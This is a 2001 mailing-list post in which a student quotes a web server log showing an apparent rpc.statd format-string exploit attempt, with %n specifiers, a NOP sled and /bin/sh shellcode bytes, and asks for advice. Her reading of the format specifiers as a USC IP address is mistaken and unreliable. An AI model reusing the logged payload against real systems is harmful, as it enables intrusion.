|
I decided to review my own logs (I know I should do it more
often).
Apparently, my web server has been attacked repeatedly and if the IP is true (If I am reading it right, maybe it is just mumbo jumbo I'm misinterpreting), it is coming from USC. Here is the log: Apr 18 15:25:08 hwnet /sbin/rpc.statd[177]: gethostbyname error for ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7 \xff\xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 \220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 Apr 18 15:25:08 hwnet \xc7^F/bin\xc7F^D/shA0\xc0\210F^G\211v^L\215V^P\215N^L\211\xf3\xb0^K\xcd\200\xb0^A\xcd\200\xe8\177\xff\xff\xff Now, if I am not reading too much into it, I clearly see the IP "236x%n%137x%n%10x%n%192". Does that mean 236.137.10.192? Now popping that IP into the whois at arin.net yielded this: University of Southern California (NET-MCAST-NET) Information Sciences Institute 4676 Admiralty Way Marina Del Rey, CA 90292-6695 US Netname: MCAST-NET Netblock: 224.0.0.0 - 239.255.255.255 Coordinator: Internet Corporation for Assigned Names and Numbers (IANA-ARIN) [EMAIL PROTECTED] (310) 823-9358 Domain System inverse mapping provided by: FLAG.EP.NET 198.32.4.13 STRUL.STUPI.SE 192.108.200.1 192.36.143.3 NS.ISI.EDU 128.9.128.127 NIC.NEAR.NET 192.52.71.4 Record last updated on 12-Sep-2000. Database last updated on 20-Apr-2001 00:14:29 EDT. Could it be a spoofed address? A compromised machine doing the scanning? Some script kiddy kid sitting in his dorm room? What is my course of action now? My main page hasn't been defaced
with pictures of someones grandma in compromising poses, so I guess that is a
good first sign the attack didn't work? Or did it work and my machine has
been compromised and is now being used for DDoS or a w4r3z britney spears mp3
porn server?
I will notify the sysadmin of my school district (I'm a student) of this of
course.
If that IP is true, should I be contacting a USC sysadmin? I would feel especially responsible if it was some poor sysadmin's compromised machine at another school. - Kath, the perpetually worried |
- Re: [techtalk] Should I feel honored? Kath
- Re: [techtalk] Should I feel honored? Nicole Zimmerman
- Re: [techtalk] Should I feel honored? jenn
- Re: [techtalk] Should I feel honored? Kath
- Re: [techtalk] Should I feel honored? Nicole Zimmerman
- Re: [techtalk] Should I feel honored? Kath
- Re: [techtalk] Should I feel honore... Nicole Zimmerman
- Re: [techtalk] Should I feel ho... Nicole Zimmerman
- Re: [techtalk] Should I fee... Nicole Zimmerman
